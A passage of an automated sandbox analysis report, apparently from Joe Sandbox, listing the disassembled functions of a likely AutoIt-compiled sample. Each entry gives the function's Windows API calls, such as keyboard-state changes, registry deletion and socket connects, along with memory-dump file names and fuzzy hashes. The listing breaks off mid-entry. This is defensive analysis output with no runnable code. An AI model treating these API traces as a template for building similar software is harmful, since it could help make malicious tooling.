                                                                                                                                                  Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetParent.USER32(00000000), ref: 00460DA5
                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00460DBA
                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00460E1B
                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                  • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                                                                                  • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                                                                                                                                  • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                                                                                  • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                                                                                                                                  Function 00AB7B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00AB8311,?,00000000,?,00000000,00000000), ref: 00AB7BDE
                                                                                                                                                  • __fassign.LIBCMT ref: 00AB7C59
                                                                                                                                                  • __fassign.LIBCMT ref: 00AB7C74
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00AB7C9A
                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,00AB8311,00000000,?,?,?,?,?,?,?,?,?,00AB8311,?), ref: 00AB7CB9
                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00AB8311,00000000,?,?,?,?,?,?,?,?,?,00AB8311,?), ref: 00AB7CF2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                  • Opcode ID: 818212d30ff8e882fbf843ee341a000b8492a1892070290d922cebc89f570d08
                                                                                                                                                  • Instruction ID: 8d4fd49ce2137f732eb9a50411e894cd035d15f93b9cda9110c40313ee442418
                                                                                                                                                  • Opcode Fuzzy Hash: 818212d30ff8e882fbf843ee341a000b8492a1892070290d922cebc89f570d08
                                                                                                                                                  • Instruction Fuzzy Hash: A151E470A042099FCB10CFA8DC85AEEBBF8FF49300F15455AE955E7292D770A941CFA0
                                                                                                                                                  Function 004655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2945705084-0
                                                                                                                                                  • Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                                                                                                  • Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
                                                                                                                                                  • Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                                                                                                  • Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
                                                                                                                                                  Function 0045D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                                                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                  • String ID: ,,I$DllGetClassObject
                                                                                                                                                  • API String ID: 753597075-1683996018
                                                                                                                                                  • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                                                                                                                  • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                                                                                                                                                  • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                                                                                                                  • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                                                                                                                                                  Function 00463671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                                                                                    • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 004636B7
                                                                                                                                                  • _wcscmp.LIBCMT ref: 004636D3
                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 004636EB
                                                                                                                                                  • _wcscat.LIBCMT ref: 00463733
                                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 0046379F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                                  • String ID: \*.*
                                                                                                                                                  • API String ID: 1377345388-1173974218
                                                                                                                                                  • Opcode ID: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
                                                                                                                                                  • Instruction ID: 4e874dc4fae4897927e7b4621483e23afab501f30efb2571b7469179fc3cc0d5
                                                                                                                                                  • Opcode Fuzzy Hash: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
                                                                                                                                                  • Instruction Fuzzy Hash: 1A418FB1508344AEC752EF65D4419DFB7E8AF88345F40082FB48AC3261FA38D689C75B
                                                                                                                                                  Function 00487291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 004872AA
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                                                                                                                                  • IsMenu.USER32(?), ref: 00487369
                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                                                                                                                                  • DrawMenuBar.USER32 ref: 004873C4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 3866635326-4108050209
                                                                                                                                                  • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                                                                                  • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                                                                                                                                  • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                                                                                  • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                                                                                                                                  Function 00480FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                                                                                                                                    • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                                                                                                                                    • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                                                                                                                                    • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 395352322-0
                                                                                                                                                  • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                                                                                  • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                                                                                                                                  • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                                                                                  • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                                                                                                                                  Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                                                                                                                                  • GetWindowLongW.USER32(00B834B0,000000F0), ref: 0048631F
                                                                                                                                                  • GetWindowLongW.USER32(00B834B0,000000F0), ref: 00486354
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                                  • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                                                                                  • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                                                                                                                                  • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                                                                                  • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                                                                                                                                  Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                                                                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                                                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00476221
                                                                                                                                                  • closesocket.WSOCK32(00000000), ref: 0047624A
                                                                                                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 910771015-0
                                                                                                                                                  • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                                                                                  • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                                                                                                                                  • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                                                                                  • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                                                                                                                                  Function 0045F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                                                  • Opcode ID: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                                                                                                                                  • Instruction ID: 032906fc094d91378a6d64986483b761754d261e1b02b5d61cc05f8db2f6dc85
                                                                                                                                                  • Opcode Fuzzy Hash: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                                                                                                                                  • Instruction Fuzzy Hash: E621487220412166D620AA35AC02FA773D8AF59305B90443BFC4286192EB9C9D4EC29F
                                                                                                                                                  Function 004875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                    • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                    • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                                  • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                                                                                                  • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                                                                                                                                                  • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                                                                                                  • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                                                                                                                                                  Function 00AB3216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00AB31DA: _free.LIBCMT ref: 00AB3203
                                                                                                                                                  • _free.LIBCMT ref: 00AB3264
                                                                                                                                                    • Part of subcall function 00AB2096: HeapFree.KERNEL32(00000000,00000000,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?), ref: 00AB20AC
                                                                                                                                                    • Part of subcall function 00AB2096: GetLastError.KERNEL32(?,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?,?), ref: 00AB20BE
                                                                                                                                                  • _free.LIBCMT ref: 00AB326F
                                                                                                                                                  • _free.LIBCMT ref: 00AB327A
                                                                                                                                                  • _free.LIBCMT ref: 00AB32CE
                                                                                                                                                  • _free.LIBCMT ref: 00AB32D9
                                                                                                                                                  • _free.LIBCMT ref: 00AB32E4
                                                                                                                                                  • _free.LIBCMT ref: 00AB32EF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                  • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                  • Instruction ID: 12639a2f2b2f1b66139a449ab9c7c8cf5a374aa64ffdcc6335ee5aaf3ca5b2c0
                                                                                                                                                  • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                  • Instruction Fuzzy Hash: F0112173A41B04AADD30FBB4DE07FCB779C6F05700F404915BA9E66063DA75BA148750
                                                                                                                                                  Function 0048B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                                                                                                  Download Yara Rule
